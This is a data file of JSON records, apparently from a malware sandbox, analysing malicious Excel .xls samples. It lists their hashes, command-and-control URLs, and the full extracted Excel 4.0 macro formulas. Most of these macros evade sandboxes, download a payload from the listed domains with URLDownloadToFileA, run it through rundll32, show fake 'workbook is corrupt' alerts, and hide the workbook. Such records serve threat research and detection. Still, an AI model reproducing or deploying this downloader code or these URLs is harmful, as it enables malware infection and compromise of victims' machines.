xtracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EyfD2OkPvj\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2d91d44a0ab36e79a7bcb0daa116fe094eb8a9fa1b405eb3323140ea08ea15a"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b2d91d44a0ab36e79a7bcb0daa116fe094eb8a9fa1b405eb3323140ea08ea15a","filesize":40960,"md5":"9e563031bdc0bed432a8d915e6e8ae1e","sha1":"9a48a7113c80dc25419031bfd9f3a6c8197b0b1e","sha256":"b2d91d44a0ab36e79a7bcb0daa116fe094eb8a9fa1b405eb3323140ea08ea15a","sha512":"6e64fdfdc84c48d52448023f11d4e9635e55f67f141d66793a45cd1e9ffe076120023f3d14466c8a175a76ad8d415ae2738b4655bf6b2e31124011f36ce49986","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2d91d44a0ab36e79a7bcb0daa116fe094eb8a9fa1b405eb3323140ea08ea15a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$1C$7,R$1C$8)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2e5951b43d911fab28b1b822f79f6fafd33d73ef9d550d925bba0507cd0ec74"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b2e5951b43d911fab28b1b822f79f6fafd33d73ef9d550d925bba0507cd0ec74","filesize":185344,"md5":"e16df005c5ba0a91144b88ed796757a8","sha1":"a82d544ac862d6f161869884eb8bcbf1b91d80f0","sha256":"b2e5951b43d911fab28b1b822f79f6fafd33d73ef9d550d925bba0507cd0ec74","sha512":"cc3f0b9994e44a91023a4dede3f0e8dfad8b0cdf50c74908f0fedbc4e0cb60a532ba4302a7261157c1f4d832b482cff7cbdf55b221bbf943071f5c3d31182693","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2e5951b43d911fab28b1b822f79f6fafd33d73ef9d550d925bba0507cd0ec74.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2e8ad03d5c5c10af0009b089ea3f9177573f0b600b43429c96637b6d12d1a79"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b2e8ad03d5c5c10af0009b089ea3f9177573f0b600b43429c96637b6d12d1a79","filesize":185344,"md5":"8e49a555b969445ee7e9f8c7a8aff228","sha1":"ccee67eba4fd1aaabf393bd3dc6c745d5cd7df5f","sha256":"b2e8ad03d5c5c10af0009b089ea3f9177573f0b600b43429c96637b6d12d1a79","sha512":"c42b4dda1544a5ae7a70f9406a36f225949208369b7d77b0745b7243fc37e603e3e9619b13eb4a5111c200b6cc900ae40958cdb55da73aee69d8a2e3d4c7014a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2e8ad03d5c5c10af0009b089ea3f9177573f0b600b43429c96637b6d12d1a79.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2ec985eca78d28e5959afdd00f9cd89fed222585be6726e93df9d20529d6860"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b2ec985eca78d28e5959afdd00f9cd89fed222585be6726e93df9d20529d6860","filesize":167936,"md5":"1b74b34a261aa922dfddd69a5fdf9b41","sha1":"59b4a5f2da4e68ff833615d0482ae4312f1315ed","sha256":"b2ec985eca78d28e5959afdd00f9cd89fed222585be6726e93df9d20529d6860","sha512":"ae1fb787450f88db4a67a688646ba58a6116583d0cddc456f0a7eb994ba4071c8af6152f4c2391cef4456110926a7a26e8875e915fdf59b5a7795ea259e5a788","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2ec985eca78d28e5959afdd00f9cd89fed222585be6726e93df9d20529d6860.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"llq4B9hxiq\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2f690ca720a61cc23a0c62e06c505791bb274fc0a0a6c19acd3481b0323ccf0"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b2f690ca720a61cc23a0c62e06c505791bb274fc0a0a6c19acd3481b0323ccf0","filesize":167936,"md5":"a794fe37826fafc997cb448de04944b9","sha1":"5a9251a2e493c53b22be2f27ea2792108290cefa","sha256":"b2f690ca720a61cc23a0c62e06c505791bb274fc0a0a6c19acd3481b0323ccf0","sha512":"ca0a7122504111c41a0f6165e637e46396532a39fcfa14f528d949fc2b2af8e18198c09deee331d99fbf6fc7e25a98d8f33538d40c7d4b961128f24d5689890f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2f690ca720a61cc23a0c62e06c505791bb274fc0a0a6c19acd3481b0323ccf0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yToOv1cUrp\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2fd5d34e97e1d95b3c077df6c1990c7b9fefeb03bf89d87fd4cbe4a74caf639"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b2fd5d34e97e1d95b3c077df6c1990c7b9fefeb03bf89d87fd4cbe4a74caf639","filesize":209920,"md5":"b50e3674dd4a79fb66e894666bf62fc3","sha1":"08563fb0c412a27572f715172a13307169b2fde7","sha256":"b2fd5d34e97e1d95b3c077df6c1990c7b9fefeb03bf89d87fd4cbe4a74caf639","sha512":"3ed5fcb3ac1bc2fb2fcb86e9f5e8f1d4f15be166659fa305994a99738f4f03201c3735f4a134b2217ce28fb36f4bfa26eb238fa8ad927278d82ae8b4be52b874","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2fd5d34e97e1d95b3c077df6c1990c7b9fefeb03bf89d87fd4cbe4a74caf639.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Kj8CCAz6vW\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b306a6450156a27455c34e04d9afa0d85f4a4f410e9e69716fcad74e5a33dd40"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b306a6450156a27455c34e04d9afa0d85f4a4f410e9e69716fcad74e5a33dd40","filesize":209408,"md5":"365e38b3783f155731c6822491ee0cf0","sha1":"e73ff2c3ef2085ffa232951bb7a043aea8aa0883","sha256":"b306a6450156a27455c34e04d9afa0d85f4a4f410e9e69716fcad74e5a33dd40","sha512":"edc64b51918d11503571b8718e4dae9ad583dc3a8e0aff41f567d5313fc51e036314278223b109cb037532e3efe0d16d2e294e1965df4cc7e6dfc5e9dc3708cc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b306a6450156a27455c34e04d9afa0d85f4a4f410e9e69716fcad74e5a33dd40.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5LYnj3ijgy\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b32053a3ba7f30387de2c3dae8c75ceb2d57c389f2d33bbe5583034da31615cb"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b32053a3ba7f30387de2c3dae8c75ceb2d57c389f2d33bbe5583034da31615cb","filesize":168987,"md5":"768b4cb916a78d815b70c551c0d6b95e","sha1":"081ca8d95339db1eb3e6207d9e903021967b92c2","sha256":"b32053a3ba7f30387de2c3dae8c75ceb2d57c389f2d33bbe5583034da31615cb","sha512":"ab9b933038d7a76993ffa93ed9556427484072397cb8e115692d22d0327f9ccb15acd97d3ec825f04d8b4815a897b343b6e886a36c39cb36c5b2550f8277662c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b32053a3ba7f30387de2c3dae8c75ceb2d57c389f2d33bbe5583034da31615cb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HsTbgNCazi\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b32a0d73b29384925d1d9180086fed3afedee46d86369d876134cdc5245237b2"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b32a0d73b29384925d1d9180086fed3afedee46d86369d876134cdc5245237b2","filesize":126464,"md5":"b4c96465a7c9cba4e1d817d0a731803b","sha1":"0ae02890e40eb8d536a6e4c0d6126450f01eaab7","sha256":"b32a0d73b29384925d1d9180086fed3afedee46d86369d876134cdc5245237b2","sha512":"8b5ad15942de6009e53a630e08766bd7257765b397711046fdf9e3fb56c8a0baf95b7ec080740d3505348752c2106e81a59c54ce2236c41b7355b2dd37345fe6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b32a0d73b29384925d1d9180086fed3afedee46d86369d876134cdc5245237b2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://march262020.club/files/bot.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\\hQPDpQm\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://march262020.club/files/bot.dl\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll,DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b3594ad4a9de28969c8d00bf217eccc013e27f674ef421a3977260df82cfa66b"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b3594ad4a9de28969c8d00bf217eccc013e27f674ef421a3977260df82cfa66b","filesize":221184,"md5":"e0d265fe57754043280665173e1e5fe2","sha1":"671d234d5d2c029a0389e1966e090d107204e775","sha256":"b3594ad4a9de28969c8d00bf217eccc013e27f674ef421a3977260df82cfa66b","sha512":"0b5468233d2e785534f8ee1c2f62eca007603e2aa312947936184ac8c504ffdb38a315bedbe0d1f44e49cdabfd18bb4c82390332d33c5129acbd458f6fad4973","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b3594ad4a9de28969c8d00bf217eccc013e27f674ef421a3977260df82cfa66b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PvOubVQPPB\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b360358a93c16eac14907f38ccde186720a0958dbe4fb4920771a36a9e9a9d1d"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b360358a93c16eac14907f38ccde186720a0958dbe4fb4920771a36a9e9a9d1d","filesize":206336,"md5":"4e796673f6895beb9488ffa0051b85b1","sha1":"c145d8ad0743b45eecc59dad236e13fbc503248f","sha256":"b360358a93c16eac14907f38ccde186720a0958dbe4fb4920771a36a9e9a9d1d","sha512":"b820fc83839addf12c03d98dc38e5ef0927749d991cace25d0d0080a2353634ae8b57944494aef3ab202e31e58b80e372ec3202b2f05257771f929d37dc7cb16","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b360358a93c16eac14907f38ccde186720a0958dbe4fb4920771a36a9e9a9d1d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CT1q0N1V22\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b3643de8ffda12bf905feef58ae9168121e73226e33dde01b9e74a3fcbdffa6e"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b3643de8ffda12bf905feef58ae9168121e73226e33dde01b9e74a3fcbdffa6e","filesize":116224,"md5":"9c6c89b270fd1f30b2cffb5246f3289b","sha1":"7ee5c7d30892a8d110da3272b597014671f8c73a","sha256":"b3643de8ffda12bf905feef58ae9168121e73226e33dde01b9e74a3fcbdffa6e","sha512":"43b26c79ec2d999f8013dca9c16cce573536e171c086a8e5670cbd44cdc968ea666a98a358c7dae99abe7974182c6ac28031c1094370072772568a1c342283b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b3643de8ffda12bf905feef58ae9168121e73226e33dde01b9e74a3fcbdffa6e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nxb6RZkSqc\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b3690527c3cf7d8cc1e83634c81b7e1be2253ab70ecd56d4ee7f786d4ab9c215"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b3690527c3cf7d8cc1e83634c81b7e1be2253ab70ecd56d4ee7f786d4ab9c215","filesize":160768,"md5":"1da3e48032acf76b256a13766630aa2f","sha1":"ecf2282fcc7120ddc2baa9e1a4cdf72f6960cf50","sha256":"b3690527c3cf7d8cc1e83634c81b7e1be2253ab70ecd56d4ee7f786d4ab9c215","sha512":"fc81be48f9ad09f3cb7132964f5f80fe2f1abc2f3d338f4b8aaad62c87759b7cc1fa4a422d8c7af8c4dbab238b08eb596bac8afc98f59d64b76a0cee1d2c0745","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b3690527c3cf7d8cc1e83634c81b7e1be2253ab70ecd56d4ee7f786d4ab9c215.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ILIi9Qx7qH\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b39339002d8a4168788eb1e3fb59efc523d388a98e2d8444718bce0004e81653"},"analysis":{"reported":"2020-04-09T16:18:26Z","score":10},"files":[{"filename":"b39339002d8a4168788eb1e3fb59efc523d388a98e2d8444718bce0004e81653","filesize":209920,"md5":"59c6f8f248d53559bef92c50013747fc","sha1":"c314f7c112eb9e065331ea2fd513ec3278fc0801","sha256":"b39339002d8a4168788eb1e3fb59efc523d388a98e2d8444718bce0004e81653","sha512":"6b18749f4b966a3b2f0ad45d520d5e02299901a0a80f27841b9cbaa0268095657200b43b3103ae65df8331efdb7c21ce57d660d127b320250755eef45de66f1f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b39339002d8a4168788eb1e3fb59efc523d388a98e2d8444718bce0004e81653.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MZc1rhGX37\",TRUE)\nGOTO(R$0C$16)"}}}]}
